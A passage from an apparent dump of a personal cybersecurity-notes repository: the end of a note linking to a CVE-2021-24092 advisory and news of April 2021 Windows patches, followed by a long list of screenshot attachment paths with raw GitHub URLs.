[https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24092](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24092) 14 | 15 | ## Windows RCE Patches - April 2021 16 | 17 | [https://news.sophos.com/en-us/2021/04/13/microsofts-april-update-patches-114-bugs-more-than-half-of-which-allow-remote-code-execution/](https://news.sophos.com/en-us/2021/04/13/microsofts-april-update-patches-114-bugs-more-than-half-of-which-allow-remote-code-execution/) 18 | 19 | # Tags 20 | 21 | #article #windows -------------------------------------------------------------------------------- /Attachments/Pasted image 20210330103246.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210330103246.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210330104241.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210330104241.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210330111117.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210330111117.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210330111528.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210330111528.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210330113044.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210330113044.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210330114822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210330114822.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210330115547.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210330115547.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210405151329.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210405151329.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210405152937.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210405152937.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406083553.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406083553.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406083753.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406083753.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406085414.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406085414.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406085814.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406085814.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406090351.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406090351.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406090615.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406090615.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406091211.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406091211.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406092035.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406092035.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406092416.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406092416.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406101322.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406101322.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210406101542.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210406101542.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210407195847.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210407195847.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210413145536.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210413145536.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210415125831.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210415125831.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210415130048.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210415130048.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210415130533.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210415130533.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210415131342.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210415131342.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210418150714.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210418150714.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210418171925.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210418171925.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210418173850.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210418173850.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210419140434.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210419140434.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210419141139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210419141139.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210419143912.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210419143912.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210420170103.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210420170103.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210420170704.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210420170704.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210421211435.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210421211435.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210422155138.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210422155138.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428122533.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428122533.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428122741.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428122741.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428122851.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428122851.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428123940.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428123940.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428124114.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428124114.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428124724.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428124724.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428130221.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428130221.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428131851.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428131851.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428134850.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428134850.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428135105.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428135105.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428143658.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428143658.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210428154235.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210428154235.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210429082258.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210429082258.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210429083201.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210429083201.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210429102509.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210429102509.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210429110814.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210429110814.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210429124611.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210429124611.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210429124714.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210429124714.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501111234.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501111234.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501114708.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501114708.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501180503.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501180503.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501185951.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501185951.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501191017.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501191017.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501191120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501191120.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501191356.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501191356.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501192018.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501192018.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210501205703.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210501205703.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210502103619.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210502103619.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210502104328.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210502104328.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210502104816.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210502104816.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210502105024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210502105024.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210502105053.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210502105053.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210502105629.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210502105629.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210502180238.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210502180238.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210503224059.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210503224059.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210503224421.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210503224421.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210503225240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210503225240.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504124212.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504124212.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504124851.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504124851.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504124931.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504124931.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504131221.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504131221.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504131242.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504131242.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504132129.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504132129.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504132312.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504132312.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504133101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504133101.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504133324.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504133324.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504133752.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504133752.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504133840.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504133840.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504135209.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504135209.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504135400.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504135400.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504142751.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504142751.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504143146.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504143146.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210504145745.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210504145745.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505083541.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505083541.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505085925.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505085925.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505085959.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505085959.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505090142.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505090142.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505090246.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505090246.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505090543.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505090543.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505090749.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505090749.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505091030.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505091030.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505093721.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505093721.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505101232.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505101232.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505104808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505104808.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505105226.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505105226.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505105452.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505105452.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505111640.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505111640.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505111945.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505111945.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505112810.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505112810.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210505114032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210505114032.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210506083252.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210506083252.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210506083329.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210506083329.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210506083738.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210506083738.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210506083852.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210506083852.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210506084032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210506084032.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210506084213.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210506084213.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210506084248.png: -------------------------------------------------------------------------------- 